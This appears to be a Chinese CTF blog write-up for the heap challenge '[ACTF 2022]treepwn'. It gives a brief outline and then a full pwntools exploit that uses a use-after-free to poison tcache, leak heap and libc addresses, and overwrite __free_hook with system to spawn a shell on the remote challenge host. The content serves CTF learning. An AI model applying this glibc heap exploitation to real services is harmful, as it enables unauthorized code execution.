0%

fuzzing!

2025-06-28 08:01By
KHIGHL
PWN

Problem: [ACTF 2022]treepwn

思路

  • fuzzing得到uaf具体攻击手法,通过劫持teache_struct的数组域与链表域实现任意地址写,将某个堆块头部大放入unsortbins,以此泄露Libc.最后劫持free_hook为system以getshell

EXP

from pwn import *
libc=ELF('./libc-2.27.so')
def cho(num):
r.sendlineafter(b'> ',str(num).encode())

def add(x,y,name=b'\x00'):
cho(0)
data=r.recv()
print(data)
if b"two many" in data:
raise EOFerror
r.sendline(str(x).encode())
r.sendlineafter(b"value: ",str(y).encode())
r.sendafter(b"new element name: ",name.ljust(0x20,b'\x00'))

def delet(x,y):
cho(1)
r.sendlineafter(b"want element x-coordinate value: ",str(x).encode())
r.sendlineafter(b"want element y-coordinate value: ",str(y).encode())

def edit(x,y,name):
cho(2)
r.sendlineafter(b"want element x-coordinate value: ",str(x).encode())
r.sendlineafter(b"want element y-coordinate value: ",str(y).encode())
r.sendafter(b"name: ",name.ljust(0x20,b'\x00'))

def show(x,y):
cho(3)
r.sendlineafter(b'value',str(x).encode())
r.sendlineafter(b'value',str(y).encode())

def query(a,b,c,d):
cho(4)
r.sendlineafter(b"value: ",str(a).encode())
r.sendlineafter(b"value: ",str(b).encode())
r.sendlineafter(b"value: ",str(c).encode())
r.sendlineafter(b"value: ",str(d).encode())
def bug():
gdb.attach(r)
#r=process('./pwn')
r=remote("node5.anna.nssctf.cn",23868)
add(1,1,str(10).encode())
add(0,6,str(20).encode())
add(7,2,str(30).encode())
add(2,0,str(40).encode())
add(1,3,str(50).encode())
add(3,4,str(60).encode())
add(6,5,str(70).encode())
add(4,8,str(80).encode())
delet(0,6)
add(3,7,str(90).encode())
add(7,6,str(110).encode())
add(2,2,b"aaa")
add(2,3,b'a'*8)
delet(2,3)
delet(2,2)
delet(1,3)
#delet(1,3)

query(1,0,5,5)
r.recvuntil(b"2-th name: ")
heap=u64(r.recv(8))-0x5c0
print(f"heap=>{hex(heap)}")
head=heap+0x580
#===============================================================
edit(1,3,p64(heap+0x10+0x48))
add(4,1)#
add(4,2) #control_ptr(4,2)
edit(4,2,p64(heap+0x10))
add(4,3,p8(5)*2) #control_num(4,3)
edit(4,2,p64(heap+0x30))
add(4,4,p8(7))
#===============================================================
edit(4,2,p64(head-0x18))
add(5,5)
edit(4,2,p64(head))
add(4,5,p64(0)+p64(0x221))
edit(4,2,p64(head+0x10))
add(5,1)
delet(5,1)
query(0,0,6,6)
r.recvuntil(b"12-th name: \x00\x00\x00\x00\x00\x00\x00\x00!\x02\x00\x00\x00\x00\x00\x00")
base=u64(r.recv(8))-0x3ebca0
print(f"base=>{hex(base)}")
#===============================================================
fhook=base+libc.sym.__free_hook
system=base+libc.sym.system
edit(4,2,p64(fhook-8))
add(5,6,b"/bin/sh\x00"+p64(system))

delet(5,6)
r.interactive()
~

总结

  • 无需理解elf文件中的r树,只关心如何uaf
还没有人赞赏,快来当第一个赞赏的人吧!
  
© 著作权归作者所有
加载失败
广告
×
评论区
添加新评论
文章信息
板块PWN
作者
KHIGHL
目录导航